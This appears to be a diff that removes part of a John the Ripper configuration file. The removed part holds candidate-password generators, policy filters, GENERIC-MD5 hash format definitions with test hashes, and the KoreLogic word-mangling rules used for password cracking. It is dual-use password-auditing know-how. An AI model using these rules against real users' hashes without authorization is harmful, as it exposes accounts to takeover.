-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-
-	last = length - 1;
-	pos = -1;
-	while (++pos <= last)
-		word[pos] = charset[id[pos] = pos << 8];
-	lastid = (lastofs = last << 8) - 1;
-	word[pos] = 0;
-}
-
-void generate()
-{
-	int pos;
-
-/* Handle the typical case specially */
-	if (word[last] = charset[++lastid]) return;
-
-	word[pos = last] = charset[lastid = lastofs];
-	while (pos--) {			// Have a preceding position?
-		if (word[pos] = charset[++id[pos]]) return;
-		word[pos] = charset[id[pos] = pos << 8];
-	}
-
-	word = 0;			// We're done
-}
-
-void restore()
-{
-	int i, c;
-
-/* Calculate the current length and infer the character indices */
-	last = 0;
-	while (c = word[last]) {
-		i = lastofs = last << 8;
-		while (charset[i] != c && charset[i]) i++;
-		if (!charset[i]) i = lastofs; // Not found
-		id[last++] = i;
-	}
-	lastid = id[--last];
-}
-
-# Try strings of repeated characters.
-[List.External:Repeats]
-int minlength, maxlength, minc, maxc, length, c;
-
-void init()
-{
-	minlength = 1;
-	maxlength = 72;
-	minc = 0x20;
-	maxc = 0xff;
-
-	length = minlength; c = minc;
-}
-
-void generate()
-{
-	int i;
-
-	i = 0;
-	while (i < length)
-		word[i++] = c;
-	word[i] = 0;
-
-	if (c++ < maxc)
-		return;
-
-	c = minc;
-	if (++length > maxlength)
-		c = 0; // Will NUL out the next "word" and thus terminate
-}
-
-# Generate candidate passwords from many small subsets of characters from a
-# much larger full character set.  This will test for passwords containing too
-# few different characters.  As currently implemented, this code will produce
-# some duplicates, although their number is relatively small when the maximum
-# number of different characters (the maxdiff setting) is significantly lower
-# than the maximum length (the maxlength setting).  Nevertheless, you may want
-# to pass the resulting candidate passwords through "unique" if you intend to
-# test them against hashes that are salted and/or of a slow to compute type.
-[List.External:Subsets]
-int minlength;		// Minimum password length to try
-int maxlength;		// Maximum password length to try
-int startdiff;		// Initial number of characters in a subset to try
-int maxdiff;		// Maximum number of characters in a subset to try
-int last;		// Last character position, zero-based
-int lastid;		// Character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int subset[0x100], c0;	// Current subset
-int subcount;		// Number of characters in the current subset
-int subid[0x100];	// Indices into charset[] of characters in subset[]
-int charset[0x100];	// Full character set
-int charcount;		// Number of characters in the full charset
-
-void init()
-{
-	int i, c;
-
-	minlength = 1;	// Minimum password length to try, must be at least 1
-	maxlength = 8;	// Must be at least same as minlength
-
-	startdiff = 1;	// Initial number of different characters to try
-	maxdiff = 3;	// Maximum number of different characters to try
-
-/* This defines the character set */
-	i = 0;
-	c = 0x20;
-	while (c <= 0x7e)
-		charset[i++] = c++;
-
-	if (maxdiff > (charcount = i))
-		maxdiff = i;
-	if (maxdiff > maxlength)
-		maxdiff = maxlength;
-
-/*
- * Initialize the variables such that generate() gets to its "next subset"
- * code, which will initialize everything for real.
- */
-	subcount = (i = startdiff) - 1;
-	while (i--)
-		subid[i] = charcount;
-	subset[0] = c0 = 0;
-	last = maxlength - 1;
-	lastid = -1;
-}
-
-void generate()
-{
-	int i;
-
-/* Handle the typical case specially */
-	if (word[last] = subset[++lastid]) return;
-
-	lastid = 0;
-	word[i = last] = c0;
-	while (i--) {			// Have a preceding position?
-		if (word[i] = subset[++id[i]]) return;
-		id[i] = 0;
-		word[i] = c0;
-	}
-
-	if (++last < maxlength) {	// Next length?
-		id[last] = lastid = 0;
-		word[last] = c0;
-		word[last + 1] = 0;
-		return;
-	}
-
-/* Next subset */
-	if (subcount) {
-		int j;
-		i = subcount - 1;
-		j = charcount;
-		while (++subid[i] >= j) {
-			if (i--) {
-				j--;
-				continue;
-			}
-			subid[i = 0] = 0;
-			subset[++subcount] = 0;
-			break;
-		}
-	} else {
-		subid[i = 0] = 0;
-		subset[++subcount] = 0;
-	}
-	subset[i] = charset[subid[i]];
-	while (++i < subcount)
-		subset[i] = charset[subid[i] = subid[i - 1] + 1];
-
-	if (subcount > maxdiff) {
-		word = 0;		// Done
-		return;
-	}
-
-/*
- * We won't be able to fully use the subset if the length is smaller than the
- * character count.  We assume that we've tried all smaller subsets before, so
- * we don't bother with such short lengths.
- */
-	if (minlength < subcount)
-		last = subcount - 1;
-	else
-		last = minlength - 1;
-	c0 = subset[0];
-	i = 0;
-	while (i <= last) {
-		id[i] = 0;
-		word[i++] = c0;
-	}
-	lastid = 0;
-	word[i] = 0;
-}
-
-# Simple password policy matching: require at least one digit.
-[List.External:AtLeast1-Simple]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-		if (c >= '0' && c <= '9')
-			return; // Found at least one suitable character, good
-
-	word = 0; // No suitable characters found, skip this "word"
-}
-
-# The same password policy implemented in a more efficient and more generic
-# fashion (easy to expand to include other "sufficient" characters as well).
-[List.External:AtLeast1-Generic]
-int mask[0x100];
-
-void init()
-{
-	int c;
-
-	mask[0] = 0; // Terminate the loop in filter() on NUL
-	c = 1;
-	while (c < 0x100)
-		mask[c++] = 1; // Continue looping in filter() on most chars
-
-	c = '0';
-	while (c <= '9')
-		mask[c++] = 0; // Terminate the loop in filter() on digits
-}
-
-void filter()
-{
-	int i;
-
-	i = -1;
-	while (mask[word[++i]])
-		continue;
-	if (word[i])
-		return; // Found at least one suitable character, good
-
-	word = 0; // No suitable characters found, skip this "word"
-}
-
-# An efficient and fairly generic password policy matcher.  The policy to match
-# is specified in the check at the end of filter() and in mask[].  For example,
-# lowercase and uppercase letters may be treated the same by initializing the
-# corresponding mask[] elements to the same value, then adjusting the value to
-# check "seen" for accordingly.
-[List.External:Policy]
-int mask[0x100];
-
-void init()
-{
-	int c;
-
-	mask[0] = 0x100;
-	c = 1;
-	while (c < 0x100)
-		mask[c++] = 0x200;
-
-	c = 'a';
-	while (c <= 'z')
-		mask[c++] = 1;
-	c = 'A';
-	while (c <= 'Z')
-		mask[c++] = 2;
-	c = '0';
-	while (c <= '9')
-		mask[c++] = 4;
-}
-
-void filter()
-{
-	int i, seen;
-
-/*
- * This loop ends when we see NUL (sets 0x100) or a disallowed character
- * (sets 0x200).
- */
-	i = -1; seen = 0;
-	while ((seen |= mask[word[++i]]) < 0x100)
-		continue;
-
-/*
- * We should have seen at least one character of each type (which "add up"
- * to 7) and then a NUL (adds 0x100), but not any other characters (would
- * add 0x200).  The length must be 8.
- */
-	if (seen != 0x107 || i != 8)
-		word = 0; // Does not conform to policy
-}
-
-# Append the Luhn algorithm digit to arbitrary all-digit strings.  Optimized
-# for speed, not for size nor simplicity.  The primary optimization trick is to
-# compute the length and four sums in parallel (in two SIMD'ish variables).
-# Then whether the length is even or odd determines which two of the four sums
-# are actually used.  Checks for non-digits and for NUL are packed into the
-# SIMD'ish bitmasks as well.
-[List.External:AppendLuhn]
-int map1[0x100], map2[0x1fff];
-
-void init()
-{
-	int i;
-
-	map1[0] = ~0x7fffffff;
-	i = 1;
-	while (i < 0x100)
-		map1[i++] = ~0x7effffff;
-	i = -1;
-	while (++i < 10)
-		map1['0' + i] = i + ((i * 2 % 10 + i / 5) << 12);
-	i = -1;
-	while (++i < 0x1fff) {
-		if (i % 10)
-			map2[i] = '9' + 1 - i % 10;
-		else
-			map2[i] = '0';
-	}
-}
-
-void filter()
-{
-	int i, o, e;
-
-	i = o = e = 0;
-	while ((o += map1[word[i++]]) >= 0) {
-		if ((e += map1[word[i++]]) >= 0)
-			continue;
-		if (e & 0x01000000)
-			return; // Not all-digit, leave unmodified
-		word[i--] = 0;
-		word[i] = map2[(e & 0xfff) + (o >> 12)];
-		return;
-	}
-	if (o & 0x01000000)
-		return; // Not all-digit, leave unmodified
-	word[i--] = 0;
-	word[i] = map2[(o & 0xfff) + (e >> 12)];
-}
-
-# Here are some examples of GENERIC-MD5.
-# Please refer to doc/MD5_GENERIC for documentation on how to set these up.
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^4  (i.e. 4 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1001)]
-# expression shown will be the string:   md5_gen(1001) md5(md5(md5(md5($p))))
-Expression=md5(md5(md5(md5($p))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 4 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-Test=md5_gen(1001)57200e13b490d4ae47d5e19be026b057:test1
-Test=md5_gen(1001)c6cc44f9e7fb7efcde62ba2e627a49c6:thatsworking
-Test=md5_gen(1001)0ae9549604e539a249c1fa9f5e5fb73b:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^5  (i.e. 5 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1002)]
-# expression shown will be the string:   md5_gen(1002) md5(md5(md5(md5(md5($p)))))
-Expression=md5(md5(md5(md5(md5($p)))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 5 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1002)25de8cd0b0cf69c5b5bc19c8ee64adab:test1
-Test=md5_gen(1002)a0b535420ea47849f7c2cc09a3ad0ac3:thatsworking
-Test=md5_gen(1002)4cb029bd5b4ef79f785ca685caf17bf8:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for md5(md5($p).md5($p))
-####################################################################
-[List.Generic:md5_gen(1003)]
-# expression shown will be the string:   md5_gen(1003) md5(md5($p).md5($p))
-Expression=md5(md5($p).md5($p))
-# NOTE, this format does NOT work on SSE2.  It requires a md5() of a 64 byte string.
-# SSE (or MMX) is limtited to 54 byte max password, due to 'enhancements'
-# Thus, we need a non-sse2 safe flag.
-Flag=MGF_NOTSSE2Safe
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform hash 'like' IPB but salt replaced with password.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1003)478b10974f15e7295883224fd286ccba:test1
-Test=md5_gen(1003)18a59101e6c6fb38260d542a394ecb22:thatsworking
-Test=md5_gen(1003)630b01b68b6db6fd43a751f8147d1faf:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^6  (i.e. 6 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1004)]
-# expression shown will be the string:   md5_gen(1004) md5(md5(md5(md5(md5(md5($p))))))
-Expression=md5(md5(md5(md5(md5(md5($p))))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 6 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1004)de1b991dd27fb9813e88b957a455dccd:test1
-Test=md5_gen(1004)6a62cd3c4d81139f61fb2553cdef0dc7:thatsworking
-Test=md5_gen(1004)a977990e521c5d1d17c6d65fdf2681b4:test3
-
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^7  (i.e. 7 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1005)]
-# expression shown will be the string:   md5_gen(1005) md5(md5(md5(md5(md5(md5(md5($p)))))))
-Expression=md5(md5(md5(md5(md5(md5(md5($p)))))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 7 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1005)784c527d0d92873ff9c0773e1c35621d:test1
-Test=md5_gen(1005)efcbbe6331caecf0e7f40160e65aadcc:thatsworking
-Test=md5_gen(1005)abb8bdd2c6ac2dfea2b2af6f5aed5446:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^8  (i.e. 8 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1006)]
-# expression shown will be the string:   md5_gen(1006) md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
-Expression=md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 8 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1006)1ec1f32398f64cab51183f63630eceea:test1
-Test=md5_gen(1006)f66b339ac21d6fd6af216f2b70aab2c9:thatsworking
-Test=md5_gen(1006)e9d38522b5eeec753332e576e2e0fe5d:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for vBulletin md5(md5($p).$s)   Included here to 'exercise' the script parser
-####################################################################
-[List.Generic:md5_gen(1007)]
-# expression shown will be the string:   md5_gen(1007) md5(md5($p).$s) [vBulletin]
-Expression=md5(md5($p).$s) [vBulletin]
-# Flag needed here, is Salt.  There is no 'fixed' saltlen.
-Flag=MGF_SALTED
-Flag=MGF_ColonNOTValid
-Flag=MGF_KEYS_BASE16_IN1
-# vBulletin has a 'fixed' 3 byte salt, so list the fixed size
-SaltLen=3
-ColonChar=;
-# here is the optimized 'script' to perform vBulletin hash
-Func=MD5GenBaseFunc__set_input_len_32
-Func=MD5GenBaseFunc__append_salt
-Func=MD5GenBaseFunc__crypt
-# NOTE, vBulletin is setup to 'override' the ':'.  USUALLY, it is good to use something
-# outside of the ASCII values from 0x20 to 0x7F.  0x1F is a 'good' choice, but it will
-# cause john.conf to have a 'non-normal' ASCII char.  Thus for this 'simple' example, I
-# have used the ';' character.  NOTE this would have the same 'problems' as the ':' character
-# if used for real, since ; is also a valid character within the salt of vBulletin.
-# NOTE to run, you MUST use the command line switch:   -field-separator-char=;
-Test=md5_gen(1007)daa61d77e218e42060c2fa198ac1feaf$SXB;test1
-Test=md5_gen(1007)de56b00bb15d6db79204bd44383469bc$T &;thatsworking
-Test=md5_gen(1007)fb685c6f469f6e549c85e4c1fb5a65a6$\\H:;test3
-
-####################################################################
-# Simple GENERIC-MD5 type for joomla md5($p.$s)   Included here to 'exercise' the script parser
-####################################################################
-[List.Generic:md5_gen(1008)]
-# expression shown will be the string:   md5_gen(1008) md5($p.$s) [joomla]
-Expression=md5($p.$s) [joomla]
-# Flag needed here, is Salt.  There is no 'fixed' saltlen.
-Flag=MGF_SALTED
-# here is the optimized 'script' to perform the md5 8 times on itself.
-Func=MD5GenBaseFunc__clean_input
-Func=MD5GenBaseFunc__append_keys
-Func=MD5GenBaseFunc__append_salt
-Func=MD5GenBaseFunc__crypt
-Test=md5_gen(1008)ed52af63d8ecf0c682442dfef5f36391$1aDNNojYGSc7pSzcdxKxhbqvLtEe4deG:test1
-Test=md5_gen(1008)4fa1e9d54d89bfbe48b4c0f0ca0a3756$laxcaXPjgcdKdKEbkX1SIjHKm0gfYt1c:thatsworking
-Test=md5_gen(1008)82568eeaa1fcf299662ccd59d8a12f54$BdWwFsbGtXPGc0H1TBxCrn0GasyAlJBJ:test3
-
-
-[List.Rules:KoreLogicRules]
-
-;[List.Rules:KoreLogicRulesPrependNumNum]
-[c:] \p[c:] A0"[0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesPrependYears]
-A0"20[0-1][0-9]"
-A0"19[3-9][0-9]"
-
-# Notice: Your wordlist should likely be all lowercase - or you are wasting work
-;[List.Rules:KoreLogicRulesAppendYears]
-[c:] \p[c:] Az"19[0-9][0-9]" <+
-[c:] \p[c:] Az"20[01][0-9]" <+
-
-;[List.Rules:KoreLogicRulesPrependNumNumNum]
-[c:] \p[c:] A0"[0-9][0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesMonthsFullPreface]
-[:c] A0"\p[jJ]anuary"
-[:c] A0"\p[fF]ebruary"
-[:c] A0"\p[mM]arch"
-[:c] A0"\p[aA]pril"
-[:c] A0"\p[mM]ay"
-[:c] A0"\p[jJ]uner"
-[:c] A0"\p[jJ]uly"
-[:c] A0"\p[aA]ugust"
-[:c] A0"\p[sS]eptember"
-[:c] A0"\p[oO]ctober"
-[:c] A0"\p[nN]ovember"
-[:c] A0"\p[dD]ecember"
-
-;[List.Rules:KoreLogicRulesPrepend4LetterMonths]
-## Preface each dictionary with Janu janu Febr febr
-[:c] A0"\p[jJ]anu"
-[:c] A0"\p[fF]ebr"
-[:c] A0"\p[mM]arc"
-[:c] A0"\p[aA]pr"
-[:c] A0"\p[mM]ay"
-[:c] A0"\p[jJ]une"
-[:c] A0"\p[jJ]uly"
-[:c] A0"\p[Aa]ugu"
-[:c] A0"\p[sS]ept"
-[:c] A0"\p[oO]cto"
-[:c] A0"\p[nN]ove"
-[:c] A0"\p[Dd]ece"
-
-# Use this rule with 2EVERYTHING.dic or 3EVERYTHING.dic
-;[List.Rules:KoreLogicRulesPrependSeason]
-A0"[Ss$][uU][mM][mM][eE3][rR]"
-A0"[Ww][iI|][nN][tT+][eE3][rR]"
-A0"[Ff][aA][lL][lL]"
-A0"[Ss][pP][rR][iI][nN][gG]"
-A0"[Aa][uU][tT][uU][mM][nN]"
-
-# Use this rule with 2EVERYTHING.dic or 3EVERYTHING.dic
-;[List.Rules:KoreLogicRulesAppendSeason]
-<* Az"[Ss$][uU][mM][mM][eE3][rR]"
-<* Az"[Ww][iI|][nN][tT+][eE3][rR]"
-<* Az"[Ff][aA][lL][lL]"
-<* Az"[Ss][pP][rR][iI][nN][gG]"
-<* Az"[Aa][uU][tT][uU][mM][nN]"
-
-;[List.Rules:KoreLogicRulesPrependHello]
-A0"[hH][eE][lL][lL][oO0]"
-
-# Notice how we
-# 1) do caps first b/c they are more common in 'complex' environments
-# 2) Do !$@#%. first b/c they are the most common special chars
-;[List.Rules:KoreLogicRulesAppendCurrentYearSpecial]
-[c:] \p[c:] Az"201[0-9][!$@#%.]" <+
-[c:] \p[c:] Azq201[0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependSpecialSpecial]
-[c:] \p[c:] A0q[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAppend2Letters]
-<- Az"[a-z][a-z]"
-c <- Az"[A-Z][A-Z]"
-c <- Az"[a-z][A-Z]"
-c <- Az"[A-Z][a-z]"
-
-# Append numbers - but limit the total length.
-;[List.Rules:KoreLogicRulesAddJustNumbers]
-[c:] <* >1 \p[c:] $[0-9]
-[c:] <* >1 \p[c:] ^[0-9]
-[c:] <- >1 \p[c:] Az"[0-9][0-9]"
-[c:] <- >1 \p[c:] A0"[0-9][0-9]"
-[c:] >1 \p[c:] Az"[0-9][0-9][0-9]" <+
-# Redundant with KoreLogicRulesAppend4Num
-;-[c:] >1 \p[c:] Az"[0-9][0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesDevProdTestUAT]
-\r[::cc] <* A\p\r[0l0l]"dev" \p\r[::TT]\p\r[::0l]
-\r[::cc] <* A\p\r[0l0l]"uat" \p\r[::TT]\p\r[::0l]
-\r[::cc] <* A\p\r[0l0l]"prod" \p\r[::TT]\p\r[::0l]
-\r[::cc] <* A\p\r[0l0l]"test" \p\r[::TT]\p\r[::0l]
-
-;[List.Rules:KoreLogicRulesPrependAndAppendSpecial]
-[c:] <- \p[c:] ^[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
-
-# Redundant with KoreLogicRulesAddJustNumbers and KoreLogicRulesAppend4Num
-;[List.Rules:KoreLogicRulesAppendJustNumbers]
-;-[c:] <* \p[c:] $[0-9]
-;-[c:] <- \p[c:] Az"[0-9][0-9]"
-;-[c:] \p[c:] Az"[0-9][0-9][0-9]" <+
-;-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendNumbers_and_Specials_Simple]
-# cap first letter then add a 0  2 6 9 ! *  to the end
-[c:] <* \p[c:] $[0-9!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
-# cap first letter then add a special char - THEN a number  !0 %9 !9 etc
-[c:] <- \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q
-# Cap the first letter - then add 0? 0! 5_ .. 9!
-## add NUMBER then SPECIAL    1! .. 9?
-[c:] <- \p[c:] Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-## Add Number Number Special
-;-[c:] \p[c:] Azq[0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-## Add Special Number Number
-;-[c:] \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q <+
-# Add 100! ... 999! to the end
-;-[c:] \p[c:] Azq[0-9][0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesAppendJustSpecials]
-[c:] <* \p[c:] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
-[c:] <- \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAddShortMonthsEverywhere]
-<* >\r[00123456789] A\p[z0-9]"[jJ][aA][nN]"
-<* >\r[00123456789] A\p[z0-9]"[fF][eE][bB]"
-<* >\r[00123456789] A\p[z0-9]"[mM][aA][rRyY]"
-<* >\r[00123456789] A\p[z0-9]"[aA][pP][rR]"
-<* >\r[00123456789] A\p[z0-9]"[jJ][uU][nNlL]"
-<* >\r[00123456789] A\p[z0-9]"[aA][uU][gG]"
-<* >\r[00123456789] A\p[z0-9]"[sS][eE][pP]"
-<* >\r[00123456789] A\p[z0-9]"[oO][cC][tT]"
-<* >\r[00123456789] A\p[z0-9]"[nN][oO][vV]"
-<* >\r[00123456789] A\p[z0-9]"[dD][eE][cC]"
-
-# this will add the string '2010' at all places in the word:
-# USE this with a 4 or 5 char dictionary file with ALL characters
-# soo abcde will become
-# 2010abcde  a2010bcde  ab2010cde  acd2010de  abcd2010e  abcde2010
-;[List.Rules:KoreLogicRulesAdd2010Everywhere]
-<* >\r[00123456789] A\p[z0-9]"201[0-9]"
-
-;[List.Rules:KoreLogicRulesAdd1234_Everywhere]
-<* >\r[00123456789] A\p[z0-9]"1234"
-
-;[List.Rules:KoreLogicRulesAppendMonthDay]
-[:c] <* Az"\p[jJ]anuary"
-[:c] Az"\p[jJ]anuary[0-9]" <+
-[:c] Az"\p[jJ]anuary[0-9][0-9]" <+
-[:c] <* Az"\p[fF]ebruary"
-[:c] Az"\p[fF]ebruary[0-9]" <+
-[:c] Az"\p[fF]ebruary[0-9][0-9]" <+
-[:c] Az"\p[mM]arch"
-[:c] Az"\p[mM]arch[0-9]" <+
-[:c] Az"\p[mM]arch[0-9][0-9]" <+
-[:c] <* Az"\p[aA]pril"
-[:c] Az"\p[aA]pril[0-9]" <+
-[:c] Az"\p[aA]pril[0-9][0-9]" <+
-[:c] <* Az"\p[mM]ay"
-[:c] Az"\p[mM]ay[0-9]" <+
-[:c] Az"\p[mM]ay[0-9][0-9]" <+
-[:c] <* Az"\p[jJ]une"
-[:c] Az"\p[jJ]une[0-9]" <+
-# There was a typo in Kore's original revision of this rule
-[:c] Az"\p[jJ]une[0-9][0-9]" <+
-[:c] <* Az"\p[jJ]uly"
-[:c] Az"\p[jJ]uly[0-9]" <+
-[:c] Az"\p[jJ]uly[0-9][0-9]" <+
-[:c] <* Az"\p[aA]ugust"
-[:c] Az"\p[aA]ugust[0-9]" <+
-[:c] Az"\p[aA]ugust[0-9][0-9]" <+
-[:c] <* Az"\p[sS]eptember"
-[:c] Az"\p[sS]eptember[0-9]" <+
-# There was a typo in Kore's original revision of this rule
-[:c] Az"\p[sS]eptember[0-9][0-9]" <+
-[:c] <* Az"\p[oO]ctober"
-[:c] Az"\p[oO]ctober[0-9]" <+
-[:c] Az"\p[oO]ctober[0-9][0-9]" <+
-[:c] <* Az"\p[nN]ovember"
-[:c] Az"\p[nN]ovember[0-9]" <+
-[:c] Az"\p[nN]ovember[0-9][0-9]" <+
-[:c] <* Az"\p[dD]ecember"
-[:c] Az"\p[dD]ecember[0-9]" <+
-[:c] Az"\p[dD]ecember[0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendMonthCurrentYear]
-[:c] <* Az"\p[jJ]an201[0-9]"
-[:c] <* Az"\p[fF]eb201[0-9]"
-[:c] <* Az"\p[mM]ar201[0-9]"
-[:c] <* Az"\p[aA]pr201[0-9]"
-[:c] <* Az"\p[mM]ay201[0-9]"
-[:c] <* Az"\p[jJ]un201[0-9]"
-[:c] <* Az"\p[jJ]ul201[0-9]"
-[:c] <* Az"\p[Aa]ug201[0-9]"
-[:c] <* Az"\p[sS]ep201[0-9]"
-[:c] <* Az"\p[oO]ct201[0-9]"
-[:c] <* Az"\p[nN]ov201[0-9]"
-[:c] <* Az"\p[Dd]ec201[0-9]"
-
-;[List.Rules:KoreLogicRulesReplaceNumbers2Special]
-/[1-90] s\0\p[!@#$%^&*()]
-/1 /[2-90] s1! s\0\p[@#$%^&*()]
-/2 /[3-90] s2@ s\0\p[#$%^&*()]
-/3 /[4-90] s3# s\0\p[$%^&*()]
-/4 /[5-90] s4$ s\0\p[%^&*()]
-/5 /[6-90] s5% s\0\p[^&*()]
-/6 /[7-90] s6^ s\0\p[&*()]
-/7 /[890] s7& s\0\p[*()]
-/8 /[90] s8* s\0\p[()]
-/9 /0 s9( s0)
-
-;[List.Rules:KoreLogicRulesReplaceNumbers]
-/0 s0[1-9]
-/1 s1[02-9]
-/2 s2[013-9]
-/3 s3[0-24-9]
-/4 s4[0-35-9]
-/5 s5[0-46-9]
-/6 s6[0-57-9]
-/7 s7[0-68-9]
-/8 s8[0-79]
-/9 s9[0-8]
-# 10 lines above can be replaced with just one:
-# /[0-9] s\0[0-9] Q
-# but it's slower (generates, then rejects some duplicates).
-
